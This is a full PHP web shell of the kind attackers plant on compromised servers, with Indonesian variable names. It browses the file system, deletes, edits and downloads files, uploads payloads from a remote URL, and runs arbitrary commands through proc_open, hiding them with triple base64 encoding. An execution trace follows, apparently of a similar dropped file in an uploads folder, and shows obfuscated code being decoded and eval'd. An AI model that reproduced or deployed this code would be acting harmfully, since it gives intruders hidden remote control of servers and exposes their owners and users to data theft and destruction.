placeholder=\"file.txt\"><input type=\"submit\" name=\"linknya\" class=\"up\" value=\"Upload\" style=\"cursor: pointer; border-color: #fff\">\r\n<br><br>403 Upload File<br>\r\n<input type=\"file\" id=\"datanya\" onchange=\"setfilename(this.value); loadFile(this.files[0])\"/>\r\n<input type=\"hidden\" name=\"bepasnama\" id=\"namanya\">\r\n<textarea style=\"display: none\" id=\"bepasdata\" name=\"bepasdata\"></textarea>\r\n<input type=\"submit\" name=\"bepas\" value=\"Upload\" class=\"up\" style=\"cursor: pointer; border-color: #fff\">\r\n</form><br><br></center>';\r\n} elseif (\$_GET['komend'] == \"gaskan\") {\r\n    echo \"<center>\";\r\n    echo '<form method=\"post\" onsubmit=\"document.getElementById(\\'komendnya\\').value = btoa(btoa(btoa(document.getElementById(\\'komendnya\\').value)))\">\r\n    '.@get_current_user().'@'.ipserv().':~ \$ <input type=\"text\" name=\"komend\" id=\"komendnya\" style=\"background-color: #1f1f1f; color: #fff\">\r\n    <input type=\"submit\" name=\"eksekomend\" value=\" >> \" class=\"up\" style=\"cursor: pointer; border-color: #fff\">\r\n    </form><br>';\r\n    if (isset(\$_POST['eksekomend'])) {\r\n        ekse(\$_POST['komend'], \$lokasi);\r\n    }\r\n    echo \"</center>\";\r\n} \r\n\r\nif (!is_readable(\$lokasi)) {\r\n    die(\"<center>This directory is unreadable :(</center>\");\r\n}\r\n\r\necho '<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Last Modified</center></td>\r\n<td><center>Owner</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>';\r\n\r\nforeach(\$lokasinya as \$dir){\r\n    if(!is_dir(\$lokasi.\"/\".\$dir) || \$dir == '.') continue;\r\n    echo \"<tr>\r\n    <td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href=\\\"?path=\".\$lokasi.\"/\".\$dir.\"\\\">\".\$dir.\"</a></td>\r\n    <td><center>--</center></td>\r\n    <td><center>\".filedate(\$lokasi.\"/\".\$dir).\"</center></td>\r\n    <td>\".owner(\$lokasi.\"/\".\$dir).\"</td>\r\n    <td><center>\";\r\n    if(is_writable(\$lokasi.\"/\".\$dir)) echo '<font color=\"green\">';\r\n    elseif(!is_readable(\$lokasi.\"/\".\$dir)) echo '<font color=\"red\">';\r\n    echo statusnya(\$lokasi.\"/\".\$dir);\r\n    if(is_writable(\$lokasi.\"/\".\$dir) || !is_readable(\$lokasi.\"/\".\$dir)) echo '</font>';\r\n\r\n    echo \"</center></td>\r\n    <td><center><form method=\\\"POST\\\" action=\\\"?pilihan&path=\$lokasi\\\">\r\n    <select name=\\\"pilih\\\">\r\n    <option value=\\\"\\\"></option>\r\n    <option value=\\\"hapus\\\">Delete</option>\r\n    <option value=\\\"gantinama\\\">Rename</option>\r\n    </select>\r\n    <input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"dir\\\">\r\n    <input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$dir\\\">\r\n    <input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$lokasi/\$dir\\\">\r\n    <input type=\\\"submit\\\" class=\\\"gas\\\" value=\\\">\\\" />\r\n    </form></center></td>\r\n    </tr>\";\r\n}\r\n\r\necho '<tr class=\"first\"><td></td><td></td><td></td><td></td><td></td><td></td></tr>';\r\nforeach(\$lokasinya as \$file) {\r\n    if(!is_file(\"\$lokasi/\$file\")) continue;\r\n    \$size = filesize(\"\$lokasi/\$file\")/1024;\r\n    \$size = round(\$size,3);\r\n    if(\$size >= 1024){\r\n    \$size = round(\$size/1024,2).' MB';\r\n} else {\r\n    \$size = \$size.' KB';\r\n}\r\n\r\necho \"<tr>\r\n<td>\".cekfile(\$lokasi.\"/\".\$file).\"<a href=\\\"?fileloc=\$lokasi/\$file&path=\$lokasi\\\">\$file</a></td>\r\n<td><center>\".\$size.\"</center></td>\r\n<td><center>\".filedate(\$lokasi.\"/\".\$file).\"</center></td>\r\n<td>\".owner(\$lokasi.\"/\".\$file).\"</td>\r\n<td><center>\";\r\nif(is_writable(\"\$lokasi/\$file\")) echo '<font color=\"green\">';\r\nelseif(!is_readable(\"\$lokasi/\$file\")) echo '<font color=\"red\">';\r\necho statusnya(\"\$lokasi/\$file\");\r\nif(is_writable(\"\$lokasi/\$file\") || !is_readable(\"\$lokasi/\$file\")) echo '</font>';\r\necho \"</center></td><td><center>\r\n<form method=\\\"post\\\" action=\\\"?pilihan&path=\$lokasi\\\">\r\n<select name=\\\"pilih\\\">\r\n<option value=\\\"\\\"></option>\r\n<option value=\\\"hapus\\\">Delete</option>\r\n<option value=\\\"dunlut\\\">Download</option>\r\n<option value=\\\"gantinama\\\">Rename</option>\r\n<option value=\\\"edit\\\">Edit</option>\";\r\nif (class_exists(\"ZipArchive\")) {\r\n    echo \"<option value=\\\"unzip\\\">Unzip</option>\";\r\n}\r\necho \"</select>\r\n<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">\r\n<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$file\\\">\r\n<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$lokasi/\$file\\\">\r\n<input type=\\\"submit\\\" class=\\\"gas\\\" value=\\\">\\\" />\r\n</form></center></td>\r\n</tr>\";\r\n}\r\necho '</tr></td></table></table>';\r\nauthor();\r\n\r\nfunction statusnya(\$file){\r\n\$izin = substr(sprintf('%o', fileperms(\$file)), -4);\r\nreturn \$izin;\r\n}\r\n?>");
?>

<!DOCTYPE html>
<html>
<head>
    <meta name="theme-color" content="#1f1f1f">
</head>
<body bgcolor="#1f1f1f" text="#ffffff">
<link href="" rel="stylesheet" type="text/css">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel="stylesheet">
<style>
    @import url('https://fonts.googleapis.com/css?family=Dosis');
    @import url('https://fonts.googleapis.com/css?family=Bungee');
body {
    font-family: "Dosis", cursive;
    text-shadow:0px 0px 1px #757575;
}

body::-webkit-scrollbar {
  width: 12px;
}

body::-webkit-scrollbar-track {
  background: #1f1f1f;
}

body::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

#content tr:hover {
    background-color: #636263;
    text-shadow:0px 0px 10px #fff;
}

#content .first {
    background-color: #25383C;
}

#content .first:hover {
    background-color: #25383C
    text-shadow:0px 0px 1px #757575;
}

table {
    border: 1px #000000 dotted;
    table-layout: fixed;
    word-break: break-all;
}

textarea {
    max-width: 95%;
    max-height: 100%;
    resize: none;
    outline: none;
    overflow: auto;
    background: transparent;
    color: #fff;
}

textarea::-webkit-scrollbar {
  width: 12px;
}

textarea::-webkit-scrollbar-track {
  background: #1f1f1f;
}

textarea::-webkit-scrollbar-thumb {
  background-color: #1f1f1f;
  border: 3px solid gray;
}

a {
    color: #ffffff;
    text-decoration: none;
}

a:hover {
    color: gold;
    text-shadow:0px 0px 10px #ffffff;
}

input,select,textarea {
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}

.gas {
    background-color: #1f1f1f;
    color: #ffffff;
    cursor: pointer;
}

select {
    background-color: transparent;
    color: #ffffff;
}

select:after {
    cursor: pointer;
}

.linka {
    background-color: transparent;
    color: #ffffff;
}

.up {
    background-color: transparent;
    color: #fff;
}

option {
    background-color: #1f1f1f;
}

::-webkit-file-upload-button {
  background: transparent;
  color: #fff;
  border-color: #fff;
  cursor: pointer;
}
</style>
<script>
function setfilename(val)
  {
    filename = val.split('\\').pop().split('/').pop();
    //filename = filename.substring(0, filename.lastIndexOf('.'));
    document.getElementById('namanya').value = filename;
  }

async function loadFile(file) {
    let text = await file.text();
    document.getElementById("bepasdata").innerHTML = text;
}
</script>
<center>
<font face="Bungee" size="5"></font></center>	
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>
<?php 
set_time_limit(0);
error_reporting(0);
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
    $disf = "<font color='gold'>NONE</font>";
} else {
    $disf = "<font color='red'>" . $disfunc . "</font>";
}
function author()
{
    echo "<center><br></center>";
    exit;
}
function cekdir()
{
    if (isset($_GET['path'])) {
        $lokasi = $_GET['path'];
    } else {
        $lokasi = getcwd();
    }
    if (is_writable($lokasi)) {
        return "<font color='green'>Writeable</font>";
    } else {
        return "<font color='red'>Writeable</font>";
    }
}
function cekroot()
{
    if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
        return "<font color='green'>Writeable</font>";
    } else {
        return "<font color='red'>Writeable</font>";
    }
}
function xrmdir($dir)
{
    $items = scandir($dir);
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        $path = $dir . '/' . $item;
        if (is_dir($path)) {
            xrmdir($path);
        } else {
            unlink($path);
        }
    }
    rmdir($dir);
}
function dunlut($file)
{
    if (!is_readable($file)) {
        red("Cannot Download File / Unreadable File !");
        die;
    }
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    flush();
    readfile($file);
    die;
}
function owner($file)
{
    if (function_exists("posix_getpwuid")) {
        $tod = @posix_getpwuid(fileowner($file));
        return "<center>" . $tod['name'] . "</center>";
    } else {
        return "<center>" . fileowner($file) . "</center>";
    }
}
function cekwrite($lokasi)
{
    $izin = substr(sprintf('%o', fileperms($lokasi)), -4);
    if (is_writable($lokasi)) {
        return "<font color=green>" . $izin . "</font>";
    } else {
        return "<font color=red>" . $izin . "</font>";
    }
}
function ekse($komend, $lokasi)
{
    if (!function_exists("proc_open")) {
        die("proc_open function disabled !");
    } elseif (!function_exists("base64_decode")) {
        die("base64_decode function disabled !");
    }
    $komen = base64_decode(base64_decode(base64_decode($komend)));
    $tod = @proc_open($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes, $lokasi);
    echo "<textarea rows='25' cols='100'>" . htmlspecialchars(stream_get_contents($pipes[1])) . "</textarea><br><br>";
}
function ipserv()
{
    if (empty($_SERVER['SERVER_ADDR'])) {
        return gethostbyname($_SERVER['SERVER_NAME']);
    } else {
        return $_SERVER['SERVER_ADDR'];
    }
}
function cekfile($file)
{
    return "<i class=\"fa fa-file\" style=\"color: #d6d4ce\"></i> ";
}
function filedate($file)
{
    return date("F d Y g:i:s", filemtime($file));
}
function unzip($file, $lokasi)
{
    if (!is_readable($file)) {
        red("Cannot Unzip File / Unreadable File !");
        die;
    } elseif (strpos(file_get_contents($file), "PK\x03\x04") === false) {
        red("This isn't Zip File !");
        die;
    }
    $zip = new ZipArchive();
    $res = $zip->open($file);
    if ($res == true) {
        $zip->extractTo($lokasi);
        $zip->close();
        green("Success Unzip File !");
    } else {
        red("Failed to Unzip File !");
    }
}
function green($text)
{
    echo "<center><font color='green'>" . $text . "</center></font>";
}
function red($text)
{
    echo "<center><font color='red'>" . $text . "</center></font>";
}
echo "Server IP : <font color=gold>" . ipserv() . "</font> &nbsp;/&nbsp; Your IP : <font color=gold>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
echo "Web Server : <font color='gold'>" . $_SERVER['SERVER_SOFTWARE'] . "</font><br>";
echo "System : <font color='gold'>" . php_uname() . "</font><br>";
echo "User : <font color='gold'>" . @get_current_user() . "&nbsp;</font>( <font color='gold'>" . @getmyuid() . "</font>)<br>";
echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>";
echo "Disable Function : " . $disf . "</font><br>";
echo "MySQL : ";
if (function_exists("mysql_connect")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; cURL : ";
if (function_exists("curl_init")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; WGET : ";
if (file_exists("/usr/bin/wget")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; Perl : ";
if (file_exists("/usr/bin/perl")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo " &nbsp;|&nbsp; Python : ";
if (file_exists("/usr/bin/python2")) {
    echo "<font color=green>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
foreach ($_POST as $key => $value) {
    $_POST[$key] = stripslashes($value);
}
if (isset($_GET['path'])) {
    $lokasi = $_GET['path'];
    $lokdua = $_GET['path'];
} else {
    $lokasi = getcwd();
    $lokdua = getcwd();
}
$lokasi = str_replace('\\', '/', $lokasi);
$lokasis = explode('/', $lokasi);
$lokasinya = @scandir($lokasi);
echo "<br>Directory (" . cekwrite($lokasi) . ") : &nbsp;";
foreach ($lokasis as $id => $lok) {
    if ($lok == '' && $id == 0) {
        $a = true;
        echo "<a href=\"?path=/\">/</a>";
        continue;
    }
    if ($lok == '') {
        continue;
    }
    echo "<a href=\"?path=";
    for ($i = 0; $i <= $id; $i++) {
        echo "{$lokasis[$i]}";
        if ($i != $id) {
            echo "/";
        }
    }
    echo '">' . $lok . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_POST['upwkwk'])) {
    if ($_POST['dirnya'] == "2") {
        $lokasi = $_SERVER['DOCUMENT_ROOT'];
    }
    if (isset($_POST['berkasnya'])) {
        $data = @file_put_contents($lokasi . "/" . $_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name']));
        if (file_exists($lokasi . "/" . $_FILES['berkas']['name'])) {
            echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $_FILES['berkas']['name'] . "</i></font><br><br>";
        } else {
            echo "<font color='red'>Failed to Upload !<br><br>";
        }
    } elseif (isset($_POST['linknya'])) {
        if (empty($_POST['namalink'])) {
            exit("Filename cannot be empty !");
        }
        if ($_POST['dirnya'] == "2") {
            $lokasi = $_SERVER['DOCUMENT_ROOT'];
        }
        $data = @file_put_contents($lokasi . "/" . $_POST['namalink'], @file_get_contents($_POST['darilink']));
        if (file_exists($lokasi . "/" . $_POST['namalink'])) {
            echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $_POST['namalink'] . "</i></font><br><br>";
        } else {
            echo "<font coloe='red'>Failed to Upload !<br><br>";
        }
    } elseif (isset($_POST['bepas'])) {
        $bepasdata = $_POST['bepasdata'];
        $bepasnama = $_POST['bepasnama'];
        if ($bepasdata) {
            echo "string";
        }
        @file_put_contents($lokasi . "/" . $bepasnama, $bepasdata);
        if (file_exists($lokasi . "/" . $bepasnama)) {
            echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $bepasnama . "</i></font><br><br>";
        } else {
            echo "<font coloe='red'>Failed to Upload !<br><br>";
        }
    }
}
echo "</table><br>";
echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">";
echo '<th>[ &nbsp;<a href="' . $_SERVER['SCRIPT_NAME'] . '">Home</a>&nbsp; ]</th>';
echo '<th>[ &nbsp;<a href="?path=' . $lokasi . '&komend=gaskan">C0mmand</a>&nbsp; ]</th>';
echo '<th>[ &nbsp;<a href="?path=' . $lokasi . '&upload=gaskan">Upload File</a>&nbsp; ]</th>';
echo "</table><br>";
if (isset($_GET['fileloc'])) {
    echo "<tr><td>Current File : " . $_GET['fileloc'];
    echo "</tr></td></table><br/>";
    echo "<pre>" . htmlspecialchars(file_get_contents($_GET['fileloc'])) . "</pre>";
    author();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") {
    if (is_dir($_POST['path'])) {
        xrmdir($_POST['path']);
        if (file_exists($_POST['path'])) {
            red("Failed to delete Directory !");
        } else {
            green("Delete Directory Success !");
        }
    } elseif (is_file($_POST['path'])) {
        @unlink($_POST['path']);
        if (file_exists($_POST['path'])) {
            red("Failed to Delete File !");
        } else {
            green("Delete File <i>" . basename($_POST['path']) . "</i> Success !");
        }
    }
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") {
    if (isset($_POST['gantin'])) {
        $ren = @rename($_POST['path'], $_POST['newname']);
        if ($ren == true) {
            green("Change Name Success !");
        } else {
            red("Change Name Failed !");
        }
    }
    if (empty($_POST['name'])) {
        $namaawal = $_POST['newname'];
    } else {
        $namawal = $_POST['name'];
    }
    echo "<center>" . $_POST['path'] . "<br>";
    echo '<form method="post">
    New Name : <input name="newname" type="text" class="up" size="20" value="' . $namaawal . '" />
    <input type="hidden" name="path" value="' . $_POST['path'] . '">
    <input type="hidden" name="pilih" value="gantinama">
    <input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>
    </form>';
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
    if (isset($_POST['gasedit'])) {
        $edit = @file_put_contents($_POST['path'], $_POST['src']);
        if ($edit == true) {
            green("Edit File Success !");
        } else {
            red("Edit File Failed !");
        }
    }
    echo "<center>" . $_POST['path'] . "<br><br>";
    echo '<form method="post">
    <textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br>
    <input type="hidden" name="path" value="' . $_POST['path'] . '">
    <input type="hidden" name="pilih" value="edit">
    <input type="submit" value="Edit File" name="gasedit" />
    </form><br>';
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "dunlut") {
    dunlut($_POST['path']);
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") {
    unzip($_POST['path'], $lokasi);
} elseif ($_REQUEST['upload'] == "gaskan") {
    echo "<center>Upload File : ";
    echo '<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ ' . cekdir() . ' ]
<input type="radio" value="2" name="dirnya" >document_root [ ' . cekroot() . ' ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br><br>
Upload File From Link :<br>
<input type="text" name="darilink" class="up" placeholder="https://anon7.xyz/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
<br><br>403 Upload File<br>
<input type="file" id="datanya" onchange="setfilename(this.value); loadFile(this.files[0])"/>
<input type="hidden" name="bepasnama" id="namanya">
<textarea style="display: none" id="bepasdata" name="bepasdata"></textarea>
<input type="submit" name="bepas" value="Upload" class="up" style="cursor: pointer; border-color: #fff">
</form><br><br></center>';
} elseif ($_GET['komend'] == "gaskan") {
    echo "<center>";
    echo '<form method="post" onsubmit="document.getElementById(\'komendnya\').value = btoa(btoa(btoa(document.getElementById(\'komendnya\').value)))">
    ' . @get_current_user() . '@' . ipserv() . ':~ $ <input type="text" name="komend" id="komendnya" style="background-color: #1f1f1f; color: #fff">
    <input type="submit" name="eksekomend" value=" >> " class="up" style="cursor: pointer; border-color: #fff">
    </form><br>';
    if (isset($_POST['eksekomend'])) {
        ekse($_POST['komend'], $lokasi);
    }
    echo "</center>";
}
if (!is_readable($lokasi)) {
    die("<center>This directory is unreadable :(</center>");
}
echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Last Modified</center></td>\r\n<td><center>Owner</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>";
foreach ($lokasinya as $dir) {
    if (!is_dir($lokasi . "/" . $dir) || $dir == '.') {
        continue;
    }
    echo "<tr>\r\n    <td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href=\"?path=" . $lokasi . "/" . $dir . "\">" . $dir . "</a></td>\r\n    <td><center>--</center></td>\r\n    <td><center>" . filedate($lokasi . "/" . $dir) . "</center></td>\r\n    <td>" . owner($lokasi . "/" . $dir) . "</td>\r\n    <td><center>";
    if (is_writable($lokasi . "/" . $dir)) {
        echo "<font color=\"green\">";
    } elseif (!is_readable($lokasi . "/" . $dir)) {
        echo "<font color=\"red\">";
    }
    echo statusnya($lokasi . "/" . $dir);
    if (is_writable($lokasi . "/" . $dir) || !is_readable($lokasi . "/" . $dir)) {
        echo "</font>";
    }
    echo "</center></td>\r\n    <td><center><form method=\"POST\" action=\"?pilihan&path={$lokasi}\">\r\n    <select name=\"pilih\">\r\n    <option value=\"\"></option>\r\n    <option value=\"hapus\">Delete</option>\r\n    <option value=\"gantinama\">Rename</option>\r\n    </select>\r\n    <input type=\"hidden\" name=\"type\" value=\"dir\">\r\n    <input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n    <input type=\"hidden\" name=\"path\" value=\"{$lokasi}/{$dir}\">\r\n    <input type=\"submit\" class=\"gas\" value=\">\" />\r\n    </form></center></td>\r\n    </tr>";
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td><td></td><td></td></tr>";
foreach ($lokasinya as $file) {
    if (!is_file("{$lokasi}/{$file}")) {
        continue;
    }
    $size = filesize("{$lokasi}/{$file}") / 1024;
    $size = round($size, 3);
    if ($size >= 1024) {
        $size = round($size / 1024, 2) . ' MB';
    } else {
        $size .= ' KB';
    }
    echo "<tr>\r\n<td>" . cekfile($lokasi . "/" . $file) . "<a href=\"?fileloc={$lokasi}/{$file}&path={$lokasi}\">{$file}</a></td>\r\n<td><center>" . $size . "</center></td>\r\n<td><center>" . filedate($lokasi . "/" . $file) . "</center></td>\r\n<td>" . owner($lokasi . "/" . $file) . "</td>\r\n<td><center>";
    if (is_writable("{$lokasi}/{$file}")) {
        echo "<font color=\"green\">";
    } elseif (!is_readable("{$lokasi}/{$file}")) {
        echo "<font color=\"red\">";
    }
    echo statusnya("{$lokasi}/{$file}");
    if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) {
        echo "</font>";
    }
    echo "</center></td><td><center>\r\n<form method=\"post\" action=\"?pilihan&path={$lokasi}\">\r\n<select name=\"pilih\">\r\n<option value=\"\"></option>\r\n<option value=\"hapus\">Delete</option>\r\n<option value=\"dunlut\">Download</option>\r\n<option value=\"gantinama\">Rename</option>\r\n<option value=\"edit\">Edit</option>";
    if (class_exists("ZipArchive")) {
        echo "<option value=\"unzip\">Unzip</option>";
    }
    echo "</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$lokasi}/{$file}\">\r\n<input type=\"submit\" class=\"gas\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
}
echo "</tr></td></table></table>";
author();
function statusnya($file)
{
    $izin = substr(sprintf('%o', fileperms($file)), -4);
    return $izin;
}

Execution traces

data/traces/5ad47502cb20f9ecc57040199135c12b_trace-1676239229.3644.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:00:55.262244]
1	0	1	0.000138	393528
1	3	0	0.000698	505528	{main}	1		/var/www/html/uploads/access.php	0	0
1		A						/var/www/html/uploads/access.php	3	$Cyto = 'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUPHJrNAEAWsA'
1		A						/var/www/html/uploads/access.php	4	$Lix = 'GwNnz+x/f4boLISCuXvM1peFbQsyXstZWAgPhPrMA+w/qLYnsaei5X1gW//ugChlBa4Wo3CBLuGR2yAH8gK7EbvLBI+oCLWKVp8nyWx3LIPqJ8deEphBvdNpvwyDcT1PydgrlGAWmMMgu0JjJEb/bAbD4Wu8QSYViComPrd3vOrd+3auzfr/Mx1+rS9vGu2q/ay369V5ttvmEjlfEhtTbEhwNWBvPZy47dTj9tVnqgo3QFuz+KQ56ZToialvsd8G/tjaxpw5VPHPU/xH3Nzsqw4RemlPUG3rWZg+SvuiTH+a6J0/6Fb+/jJB/bgBj8vMHbv9ZMm7unGxOeaQx5EIIG/8EXutB6+1+3xGng5Az4fw92PGYm4rk39XuoCYt3fzud9kPfqLV4tMvPYE4BtvtYo8LKfPu/soHZ98QhHjye8oqP9YFr+TYElqBRdOFTE4iCCov1uuUcMVqZSPzirhHK+IqCyUJhNoirQs8gD6UG7MOQGTeGirQ6LhMd2TFIMA'
2	4	0	0.000763	505528	base64_decode	0		/var/www/html/uploads/access.php	5	1	'Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUPHJrNAEAWsA'
2	4	1	0.000782	505688
2	4	R			'K-K��P�WK/�V�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P�ɬ�\004\001k\000'
2	5	0	0.000803	505656	gzinflate	0		/var/www/html/uploads/access.php	5	1	'K-K��P�WK/�V�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P�ɬ�\004\001k\000'
2	5	1	0.000825	505784
2	5	R			'eval(\'?&gt;\'.gzuncompress(gzinflate(base64_decode(strrev($Lix)))));'
2	6	0	0.000843	505624	htmlspecialchars_decode	0		/var/www/html/uploads/access.php	5	1	'eval(\'?&gt;\'.gzuncompress(gzinflate(base64_decode(strrev($Lix)))));'
2	6	1	0.000861	505768
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Lix)))));'
2	7	0	0.000878	505640	var_dump	0		/var/www/html/uploads/access.php	5	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($Lix)))));'
2	7	1	0.000895	505672
2	7	R			NULL
2	8	0	0.000908	505528	strrev	0		/var/www/html/uploads/access.php	6	1	'GwNnz+x/f4boLISCuXvM1peFbQsyXstZWAgPhPrMA+w/qLYnsaei5X1gW//ugChlBa4Wo3CBLuGR2yAH8gK7EbvLBI+oCLWKVp8nyWx3LIPqJ8deEphBvdNpvwyDcT1PydgrlGAWmMMgu0JjJEb/bAbD4Wu8QSYViComPrd3vOrd+3auzfr/Mx1+rS9vGu2q/ay369V5ttvmEjlfEhtTbEhwNWBvPZy47dTj9tVnqgo3QFuz+KQ56ZToialvsd8G/tjaxpw5VPHPU/xH3Nzsqw4RemlPUG3rWZg+SvuiTH+a6J0/6Fb+/jJB/bgBj8vMHbv9ZMm7unGxOeaQx5EIIG/8EXutB6+1+3xGng5Az4fw92PGYm4rk39XuoCYt3fzud9kPfqLV4tMvPYE4BtvtYo8LKfPu/soHZ98QhHjye8oqP9YFr+TYElqBRdOFTE4iCCov1uuUcMVqZSPzirhHK+IqCyUJhNoirQs8gD6UG7MOQGTeGirQ6LhMd2TFIMA'
2	8	1	0.000937	513752
2	8	R			'AdkSJu14nM08a3PbxrWfm5n8hzWiGuRUBCnJdltKZJxYUuO5tqVKcjOpqOEsgaWICgRQPEzRje9vv+fsA1gsAIqyneYqI5NanNeePXteu8jRk+OzV1e/nJ+QRbYMxt9+c1R8MurBJ4GfoyXLKAnpko2sbMGWrOdGQZRYxI3CjIXZyPpub47/WYjYl5hHs8hbk9kthy1BSMbuEWPOfzhG4Id3ZJGw+ciySMKCkZVm64ClC8YygF/HyBew+m6amgiLLIvTYb/veuG/UscNotybBzRhjhst+/Rf9L4f+LO0PwdJe3TF0mjJ+s+dvQNngNT6NAicpR86SLnGGlnxP6UeXvrLOEoykidBx1aMkXLq3EbRbcBo7KecMZD7fk6XfrAeHUepn9rdwy8g8WMe3jLGaXCd/kfQ4nMSIENicT7WLnHzJPU/MMkP1dZLF9SLVsNBfE/wdw9+v/vzc/wPoD59+40gOxz2Vmx25wO8m0RBMKOJ4LTyvWwxJHv78f0D8L0s'
2	9	0	0.000967	513720	base64_decode	0		/var/www/html/uploads/access.php	6	1	'AdkSJu14nM08a3PbxrWfm5n8hzWiGuRUBCnJdltKZJxYUuO5tqVKcjOpqOEsgaWICgRQPEzRje9vv+fsA1gsAIqyneYqI5NanNeePXteu8jRk+OzV1e/nJ+QRbYMxt9+c1R8MurBJ4GfoyXLKAnpko2sbMGWrOdGQZRYxI3CjIXZyPpub47/WYjYl5hHs8hbk9kthy1BSMbuEWPOfzhG4Id3ZJGw+ciySMKCkZVm64ClC8YygF/HyBew+m6amgiLLIvTYb/veuG/UscNotybBzRhjhst+/Rf9L4f+LO0PwdJe3TF0mjJ+s+dvQNngNT6NAicpR86SLnGGlnxP6UeXvrLOEoykidBx1aMkXLq3EbRbcBo7KecMZD7fk6XfrAeHUepn9rdwy8g8WMe3jLGaXCd/kfQ4nMSIENicT7WLnHzJPU/MMkP1dZLF9SLVsNBfE/wdw9+v/vzc/wPoD59+40gOxz2Vmx25wO8m0RBMKOJ4LTyvWwxJHv78f0D8L0s'
2	9	1	0.001008	521944
